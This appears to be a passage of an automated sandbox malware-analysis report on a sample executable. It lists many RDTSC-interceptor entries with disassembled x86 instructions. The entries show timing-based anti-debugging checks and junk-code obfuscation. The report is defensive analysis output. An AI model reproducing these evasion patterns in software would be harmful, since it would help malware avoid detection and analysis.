                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5515 second address: 5A555D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 44253BD7h 0x0000000f ja 00007FB9E4B2921Ch 0x00000015 mov dword ptr [ebp+122D1860h], esi 0x0000001b lea ebx, dword ptr [ebp+1243FEBEh] 0x00000021 jmp 00007FB9E4B29229h 0x00000026 mov dh, 3Eh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A555D second address: 5A5562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5562 second address: 5A5578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9E4B29221h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5578 second address: 5A5585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5585 second address: 5A558A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A558A second address: 5A558F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 59C37A second address: 59C390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FB9E4B29216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FB9E4B29216h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 59C390 second address: 59C39B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FB9E5277416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C54A1 second address: 5C54DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9E4B29229h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FB9E4B29228h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C55FE second address: 5C561D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9E5277422h 0x00000008 js 00007FB9E5277416h 0x0000000e jo 00007FB9E5277416h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007FB9E5277416h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C561D second address: 5C5637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29220h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C57C2 second address: 5C57C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C57C6 second address: 5C57EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E4B29216h 0x00000008 jmp 00007FB9E4B29224h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007FB9E4B29218h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C5A9D second address: 5C5AA9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9E527741Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C5DBA second address: 5C5DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C5DBE second address: 5C5DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C60B9 second address: 5C60BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C60BF second address: 5C60C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C60C3 second address: 5C60C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C6244 second address: 5C6298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FB9E5277416h 0x0000000b jng 00007FB9E5277416h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB9E527741Ah 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FB9E5277422h 0x0000001f jnc 00007FB9E5277416h 0x00000025 jmp 00007FB9E5277427h 0x0000002a popad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C63D4 second address: 5C63E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FB9E4B2923Ah 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C63E7 second address: 5C63F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB9E5277416h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C63F8 second address: 5C63FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C63FC second address: 5C6400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5BB9E6 second address: 5BB9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FB9E4B2921Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5BB9F6 second address: 5BBA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FB9E5277429h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB9E5277420h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5BBA2E second address: 5BBA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C6CA0 second address: 5C6CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E5277416h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C9939 second address: 5C9941 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5C9941 second address: 5C994C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CE679 second address: 5CE67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CE67D second address: 5CE683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CE683 second address: 5CE6A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9E4B29226h 0x00000008 jmp 00007FB9E4B29220h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CE6A7 second address: 5CE6D0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB9E5277428h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CD04F second address: 5CD05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FB9E4B29216h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CD05E second address: 5CD062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CFC89 second address: 5CFC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007FB9E4B29222h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5CFC9A second address: 5CFCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D39ED second address: 5D3A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B29226h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A07 second address: 5D3A16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A16 second address: 5D3A1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A1C second address: 5D3A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9E5277427h 0x0000000b jl 00007FB9E5277422h 0x00000011 jnc 00007FB9E5277416h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E1F second address: 593E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Dh 0x00000007 jmp 00007FB9E4B29223h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB9E4B2921Ch 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E56 second address: 593E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277427h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E73 second address: 593E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D2EF0 second address: 5D2F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9E5277421h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3172 second address: 5D319B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB9E4B29224h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9E4B2921Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35AB second address: 5D35BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35BB second address: 5D35C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35C1 second address: 5D35C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35C5 second address: 5D35F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB9E4B29223h 0x0000000c jmp 00007FB9E4B2921Dh 0x00000011 push edx 0x00000012 ja 00007FB9E4B29216h 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007FB9E4B2921Ah 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D372E second address: 5D3734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3734 second address: 5D3738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9476 second address: 5D947A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D947A second address: 5D94B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB9E4B29224h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007FB9E4B29222h 0x00000019 pop esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94B2 second address: 5D94C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9E5277416h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94C5 second address: 5D94CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94CA second address: 5D94F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jno 00007FB9E5277418h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94F0 second address: 5D9570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB9E4B29218h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D2182h] 0x00000027 mov si, 5E00h 0x0000002b call 00007FB9E4B29219h 0x00000030 jmp 00007FB9E4B2921Ah 0x00000035 push eax 0x00000036 js 00007FB9E4B29229h 0x0000003c push ecx 0x0000003d jmp 00007FB9E4B29221h 0x00000042 pop ecx 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FB9E4B29229h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9570 second address: 5D9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9575 second address: 5D9588 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FB9E4B29216h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9588 second address: 5D958C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9899 second address: 5D989E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D989E second address: 5D98A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9BBA second address: 5D9BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA23E second address: 5DA249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9E5277416h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA444 second address: 5DA448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA448 second address: 5DA44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA568 second address: 5DA56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA5ED second address: 5DA5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FB9E5277416h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA5FD second address: 5DA601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB6E7 second address: 5DB6EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB6EC second address: 5DB6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnp 00007FB9E4B2921Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB542 second address: 5DB560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jl 00007FB9E5277416h 0x0000000c je 00007FB9E5277416h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jg 00007FB9E527741Eh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DE6B8 second address: 5DE6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DF205 second address: 5DF20A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DDA08 second address: 5DDA12 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DF20A second address: 5DF249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2A06h] 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D37DEh], edx 0x00000018 push 00000000h 0x0000001a je 00007FB9E527741Ch 0x00000020 or dword ptr [ebp+1245A060h], edx 0x00000026 mov dword ptr [ebp+122D3349h], esi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB9E5277420h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E1AF4 second address: 5E1B04 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9E4B29222h 0x00000008 jbe 00007FB9E4B29216h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E2D83 second address: 5E2D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E58BC second address: 5E58D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB9E4B2921Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E6791 second address: 5E6796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E6796 second address: 5E679B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E884A second address: 5E8850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E797D second address: 5E7981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E7981 second address: 5E7985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EAA56 second address: 5EAA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
